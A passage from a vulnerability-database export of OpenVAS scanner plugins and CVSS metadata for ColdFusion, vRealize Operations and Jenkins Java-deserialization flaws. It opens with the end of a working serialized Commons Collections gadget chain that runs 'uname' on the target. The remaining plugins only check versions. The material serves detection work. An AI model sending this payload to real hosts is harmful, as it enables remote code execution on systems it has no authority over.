0x74, 0x69, 0x6d, 0x65,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x70, 0x78, 0x70, 0x73, 0x72,\n 0x00, 0x3a, 0x6f, 0x72, 0x67, 0x2e, 0x61, 0x70,\n 0x61, 0x63, 0x68, 0x65, 0x2e, 0x63, 0x6f, 0x6d,\n 0x6d, 0x6f, 0x6e, 0x73, 0x2e, 0x63, 0x6f, 0x6c,\n 0x6c, 0x65, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x73,\n 0x2e, 0x66, 0x75, 0x6e, 0x63, 0x74, 0x6f, 0x72,\n 0x73, 0x2e, 0x49, 0x6e, 0x76, 0x6f, 0x6b, 0x65,\n 0x72, 0x54, 0x72, 0x61, 0x6e, 0x73, 0x66, 0x6f,\n 0x72, 0x6d, 0x65, 0x72, 0x87, 0xe8, 0xff, 0x6b,\n 0x7b, 0x7c, 0xce, 0x38, 0x02, 0x00, 0x03, 0x5b,\n 0x00, 0x05, 0x69, 0x41, 0x72, 0x67, 0x73, 0x74,\n 0x00, 0x13, 0x5b, 0x4c, 0x6a, 0x61, 0x76, 0x61,\n 0x2f, 0x6c, 0x61, 0x6e, 0x67, 0x2f, 0x4f, 0x62,\n 0x6a, 0x65, 0x63, 0x74, 0x3b, 0x4c, 0x00, 0x0b,\n 0x69, 0x4d, 0x65, 0x74, 0x68, 0x6f, 0x64, 0x4e,\n 0x61, 0x6d, 0x65, 0x74, 0x00, 0x12, 0x4c, 0x6a,\n 0x61, 0x76, 0x61, 0x2f, 0x6c, 0x61, 0x6e, 0x67,\n 0x2f, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x3b,\n 0x5b, 0x00, 0x0b, 0x69, 0x50, 0x61, 0x72, 0x61,\n 0x6d, 0x54, 0x79, 0x70, 0x65, 0x73, 0x74, 0x00,\n 0x12, 0x5b, 0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2f,\n 0x6c, 0x61, 0x6e, 0x67, 0x2f, 0x43, 0x6c, 0x61,\n 0x73, 0x73, 0x3b, 0x70, 0x78, 0x70, 0x75, 0x72,\n 0x00, 0x13, 0x5b, 0x4c, 0x6a, 0x61, 0x76, 0x61,\n 0x2e, 0x6c, 0x61, 0x6e, 0x67, 0x2e, 0x4f, 0x62,\n 0x6a, 0x65, 0x63, 0x74, 0x3b, 0x90, 0xce, 0x58,\n 0x9f, 0x10, 0x73, 0x29, 0x6c, 0x02, 0x00, 0x00,\n 0x70, 0x78, 0x70, 0x00, 0x00, 0x00, 0x02, 0x74,\n 0x00, 0x0a, 0x67, 0x65, 0x74, 0x52, 0x75, 0x6e,\n 0x74, 0x69, 0x6d, 0x65, 0x75, 0x72, 0x00, 0x12,\n 0x5b, 0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2e, 0x6c,\n 0x61, 0x6e, 0x67, 0x2e, 0x43, 0x6c, 0x61, 0x73,\n 0x73, 0x3b, 0xab, 0x16, 0xd7, 0xae, 0xcb, 0xcd,\n 0x5a, 0x99, 0x02, 0x00, 0x00, 0x70, 0x78, 0x70,\n 0x00, 0x00, 0x00, 0x00, 0x74, 0x00, 0x09, 0x67,\n 0x65, 0x74, 0x4d, 0x65, 0x74, 0x68, 0x6f, 0x64,\n 0x75, 0x71, 0x00, 0x7e, 0x00, 0x24, 0x00, 0x00,\n 0x00, 0x02, 0x76, 0x72, 0x00, 0x10, 0x6a, 0x61,\n 0x76, 0x61, 0x2e, 0x6c, 0x61, 0x6e, 0x67, 0x2e,\n 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0xa0, 0xf0,\n 0xa4, 0x38, 0x7a, 0x3b, 0xb3, 0x42, 0x02, 0x00,\n 0x00, 0x70, 0x78, 0x70, 0x76, 0x71, 0x00, 0x7e,\n 0x00, 0x24, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x1c,\n 0x75, 0x71, 0x00, 0x7e, 0x00, 0x21, 0x00, 0x00,\n 0x00, 0x02, 0x70, 0x75, 0x71, 0x00, 0x7e, 0x00,\n 0x21, 0x00, 0x00, 0x00, 0x00, 0x74, 0x00, 0x06,\n 0x69, 0x6e, 0x76, 0x6f, 0x6b, 0x65, 0x75, 0x71,\n 0x00, 0x7e, 0x00, 0x24, 0x00, 0x00, 0x00, 0x02,\n 0x76, 0x72, 0x00, 0x10, 0x6a, 0x61, 0x76, 0x61,\n 0x2e, 0x6c, 0x61, 0x6e, 0x67, 0x2e, 0x4f, 0x62,\n 0x6a, 0x65, 0x63, 0x74, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x70,\n 0x78, 0x70, 0x76, 0x71, 0x00, 0x7e, 0x00, 0x21,\n 0x73, 0x71, 0x00, 0x7e, 0x00, 0x1c, 0x75, 0x72,\n 0x00, 0x13, 0x5b, 0x4c, 0x6a, 0x61, 0x76, 0x61,\n 0x2e, 0x6c, 0x61, 0x6e, 0x67, 0x2e, 0x53, 0x74,\n 0x72, 0x69, 0x6e, 0x67, 0x3b, 0xad, 0xd2, 0x56,\n 0xe7, 0xe9, 0x1d, 0x7b, 0x47, 0x02, 0x00, 0x00,\n 0x70, 0x78, 0x70, 0x00, 0x00, 0x00, 0x01, 0x74,\n 0x00, 0x05, 0x75, 0x6e, 0x61, 0x6d, 0x65, 0x74,\n 0x00, 0x04, 0x65, 0x78, 0x65, 0x63, 0x75, 0x71,\n 0x00, 0x7e, 0x00, 0x24, 0x00, 0x00, 0x00, 0x01,\n 0x71, 0x00, 0x7e, 0x00, 0x29, 0x73, 0x71, 0x00,\n 0x7e, 0x00, 0x17, 0x73, 0x72, 0x00, 0x11, 0x6a,\n 0x61, 0x76, 0x61, 0x2e, 0x6c, 0x61, 0x6e, 0x67,\n 0x2e, 0x49, 0x6e, 0x74, 0x65, 0x67, 0x65, 0x72,\n 0x12, 0xe2, 0xa0, 0xa4, 0xf7, 0x81, 0x87, 0x38,\n 0x02, 0x00, 0x01, 0x49, 0x00, 0x05, 0x76, 0x61,\n 0x6c, 0x75, 0x65, 0x70, 0x78, 0x72, 0x00, 0x10,\n 0x6a, 0x61, 0x76, 0x61, 0x2e, 0x6c, 0x61, 0x6e,\n 0x67, 0x2e, 0x4e, 0x75, 0x6d, 0x62, 0x65, 0x72,\n 0x86, 0xac, 0x95, 0x1d, 0x0b, 0x94, 0xe0, 0x8b,\n 0x02, 0x00, 0x00, 0x70, 0x78, 0x70, 0x00, 0x00,\n 0x00, 0x01, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x09,\n 0x3f, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x77, 0x08, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,\n 0x00, 0x00, 0x78, 0x78, 0x76, 0x72, 0x00, 0x12,\n 0x6a, 0x61, 0x76, 0x61, 0x2e, 0x6c, 0x61, 0x6e,\n 0x67, 0x2e, 0x4f, 0x76, 0x65, 0x72, 0x72, 0x69,\n 0x64, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x70, 0x78, 0x70,\n 0x71, 0x00, 0x7e, 0x00, 0x3f, 0x78, 0x71, 0x00,\n 0x7e, 0x00, 0x3f );\n\nsend( socket:soc, data:req );\nres = recv( socket:soc, length:512 );\n\nclose( soc );\n\nif( \"Integer cannot be cast to java.util.Set\" >< res )\n{\n security_message( port:port );\n exit( 0 );\n}\n\nexit( 0 );\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:24:50", "description": "This host is running Adobe ColdFusion and is\n prone to information disclosure and remote code execution vulnerabilities.", "cvss3": {}, "published": "2017-09-14T00:00:00", "type": "openvas", "title": "Adobe ColdFusion Remote Code Execution And Information Disclosure Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11286", "CVE-2017-11283", "CVE-2017-11284", "CVE-2017-11285"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310811696", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811696", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe ColdFusion Remote Code Execution And Information Disclosure Vulnerabilities\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:coldfusion\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811696\");\n script_version(\"2019-07-05T09:29:25+0000\");\n script_cve_id(\"CVE-2017-11286\", \"CVE-2017-11285\", \"CVE-2017-11283\", \"CVE-2017-11284\");\n script_bugtraq_id(100715, 100711, 100708);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:29:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-09-14 15:04:23 +0530 (Thu, 14 Sep 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Adobe ColdFusion Remote Code Execution And Information Disclosure Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running Adobe ColdFusion and is\n prone to information disclosure and remote code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - Improper Restriction of XML External Entity Reference.\n\n - Improper Neutralization of Input During Web Page Generation.\n\n - Deserialization of Untrusted Data.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code in the context of the affected application\n and gain access to sensitive information.\");\n\n script_tag(name:\"affected\", value:\"ColdFusion 11 before Update 13 and ColdFusion\n 2016 before update 5.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to ColdFusion 11 Update 13 or 2016\n update 5 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/coldfusion/apsb17-30.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_coldfusion_detect.nasl\");\n script_mandatory_keys(\"coldfusion/installed\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!cfPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\ncfdVer = get_app_version(cpe:CPE, port:cfPort);\nif(!cfdVer){\n exit(0);\n}\n\n#https://helpx.adobe.com/coldfusion/kb/coldfusion-11-update-13.html\nif(version_in_range(version:cfdVer, test_version:\"11.0\", test_version2:\"11.0.13.303667\")){\n fix = \"11.0.13.303668\";\n}\n#https://helpx.adobe.com/coldfusion/kb/coldfusion-2016-update-5.html\nelse if(version_in_range(version:cfdVer, test_version:\"2016.0\", test_version2:\"2016.0.05.303688\")){\n fix = \"2016.0.05.303689\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:cfdVer, fixed_version:fix);\n security_message(data:report, port:cfPort);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:30", "description": "vRealize Operations update addresses REST API deserialization vulnerability.", "cvss3": {}, "published": "2016-11-16T00:00:00", "type": "openvas", "title": "VMSA-2016-0020: vRealize Operations REST API Deserialization Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7462"], "modified": "2018-10-18T00:00:00", "id": "OPENVAS:1361412562310140063", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140063", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_vrealize_operations_manager_VMSA-2016-0020.nasl 11961 2018-10-18 10:49:40Z asteins $\n#\n# VMSA-2016-0020: vRealize Operations REST API Deserialization Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:vmware:vrealize_operations_manager';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140063\");\n script_cve_id(\"CVE-2016-7462\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:N/I:P/A:C\");\n script_version(\"$Revision: 11961 $\");\n script_name(\"VMSA-2016-0020: vRealize Operations REST API Deserialization Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0020.html\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Update to 6.4.0 or later\");\n\n script_tag(name:\"summary\", value:\"vRealize Operations update addresses REST API deserialization vulnerability.\");\n script_tag(name:\"insight\", value:\"vRealize Operations contains a deserialization vulnerability in its REST API implementation. This issue may result in a Denial of Service as it allows for writing of files with arbitrary content and moving existing files into certain folders. The name format of the destination files is predefined and their names cannot be chosen. Overwriting files is not feasible.\");\n\n script_tag(name:\"affected\", value:\"vRealize Operations 6.x < 6.4.0\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-18 12:49:40 +0200 (Thu, 18 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-11-16 15:53:11 +0100 (Wed, 16 Nov 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_vrealize_operations_manager_web_detect.nasl\");\n script_mandatory_keys(\"vmware/vrealize/operations_manager/version\");\n\n exit(0);\n\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\n\nif( ! version = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version =~ \"^6\\.\" )\n if( version_is_less( version:version, test_version:\"6.4.0\" ) ) fix = '6.4.0';\n\nif( fix )\n{\n report = report_fixed_ver( installed_version:version, fixed_version:fix );\n security_message( port:port, data:report );\n exit(0);\n}\n\nexit( 99 );\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:C"}}, {"lastseen": "2019-05-29T18:35:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "Fedora Update for jenkins FEDORA-2016-368780879d", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310871954", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871954", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for jenkins FEDORA-2016-368780879d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871954\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:21:40 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-9299\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for jenkins FEDORA-2016-368780879d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jenkins'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"jenkins on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-368780879d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QFJT3TVJVZH5CAVZOY7CPBY3DK7E4CPO\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"jenkins\", rpm:\"jenkins~1.651.3~2.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:37", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "Fedora Update for jenkins-remoting FEDORA-2016-368780879d", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872082", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872082", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for jenkins-remoting FEDORA-2016-368780879d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872082\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:27:04 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-9299\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for jenkins-remoting FEDORA-2016-368780879d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jenkins-remoting'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"jenkins-remoting on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-368780879d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZW2KUKYLNLVDB7STLHLYALCUFLEGCRM6\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"jenkins-remoting\", rpm:\"jenkins-remoting~2.62.3~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-18T15:19:23", "description": "This host is installed with Jenkins and is prone to\n a remote code execution vulnerability.", "cvss3": {}, "published": "2017-01-30T00:00:00", "type": "openvas", "title": "Jenkins 'Java Deserialization' Remote Code Execution Vulnerability (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2019-10-17T00:00:00", "id": "OPENVAS:1361412562310108063", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108063", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Jenkins 'Java Deserialization' Remote Code Execution Vulnerability (Linux)\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108063\");\n script_version(\"2019-10-17T11:27:19+0000\");\n script_cve_id(\"CVE-2016-9299\");\n script_bugtraq_id(94281);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-10-17 11:27:19 +0000 (Thu, 17 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-01-30 13:00:00 +0100 (Mon, 30 Jan 2017)\");\n\n script_name(\"Jenkins 'Java Deserialization' Remote Code Execution Vulnerability (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_jenkins_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"jenkins/detected\", \"Host/runs_unixoide\");\n\n script_xref(name:\"URL\", value:\"https://jenkins.io/security/advisory/2016-11-16/\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/94281\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Jenkins and is prone to\n a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an Jenkins allowing to transfer a serialized Java object to the Jenkins CLI,\n making Jenkins connect to an attacker-controlled LDAP server, which in turn can send a serialized payload leading\n to code execution, bypassing existing protection mechanisms.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows attackers to execute arbitrary code in the context of\n the affected application. Failed exploits will result in denial-of-service conditions.\");\n\n script_tag(name:\"affected\", value:\"Jenkins LTS 2.19.2 and prior, Jenkins 2.31 and prior.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Jenkins to 2.32 or later / Jenkins LTS to 2.19.3 or\n later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit(0);\n\nif( ! infos = get_app_full( cpe:CPE, port:port ) )\n exit(0);\n\nif( ! version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif( get_kb_item( \"jenkins/\" + port + \"/is_lts\" ) ) {\n if( version_is_less( version:version, test_version:\"2.19.3\" ) ) {\n vuln = TRUE;\n fix = \"2.19.3\";\n }\n} else {\n if( version_is_less( version:version, test_version:\"2.32\" ) ) {\n vuln = TRUE;\n fix = \"2.32\";\n }\n}\n\nif( vuln ) {\n report = report_fixed_ver( installed_version:version, fixed_version:fix, install_path:location );\n security_message( port:port, data:report, proto:proto );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:34", "description": "This host is running VMware vRealize\n Operations and is prone to code execution vulnerability.", "cvss3": {}, "published": "2017-04-21T00:00:00", "type": "openvas", "title": "VMware vRealize Operations Remote Code Execution Vulnerability - Apr17", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6934"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310811006", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811006", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_vrealize_operations_code_exec_vuln_apr17.nasl 11874 2018-10-12 11:28:04Z mmartin $\n#\n# VMware vRealize Operations Remote Code Execution Vulnerability - Apr17\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:vmware:vrealize_operations_manager';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811006\");\n script_version(\"$Revision: 11874 $\");\n script_cve_id(\"CVE-2015-6934\");\n script_bugtraq_id(79648);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:28:04 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-21 10:42:44 +0530 (Fri, 21 Apr 2017)\");\n script_name(\"VMware vRealize Operations Remote Code Execution Vulnerability - Apr17\");\n\n script_tag(name:\"summary\", value:\"This host is running VMware vRealize\n Operations and is prone to code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to a deserialization error\n involving Apache Commons-collections and a specially constructed chain of\n classes exists.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code in the context of current user.\");\n\n script_tag(name:\"affected\", value:\"VMware vRealize Operations 6.x before 6.2\");\n\n 